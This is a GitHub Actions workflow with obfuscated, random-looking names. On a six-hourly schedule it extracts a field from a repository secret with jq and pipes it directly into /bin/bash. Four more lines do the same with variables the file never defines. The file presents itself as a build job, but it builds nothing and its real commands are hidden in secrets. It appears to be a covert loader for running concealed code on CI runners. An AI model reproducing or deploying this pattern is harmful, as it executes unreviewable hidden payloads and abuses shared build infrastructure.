name: moshumin6712

on:
  workflow_dispatch:
  schedule:
    - cron: '12 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: moshumin6712
        env:
          ruw853: ${{ secrets.ruw853 }}
        run: |
          echo $ruw853 | jq -r .q003 | /bin/bash
          echo $tauk83455 | jq -r .g982 | /bin/bash
          echo $ihc10 | jq -r .bjmt960 | /bin/bash
          echo $x5 | jq -r .rv39085 | /bin/bash
          echo $dtn02 | jq -r .dpoo796 | /bin/bash

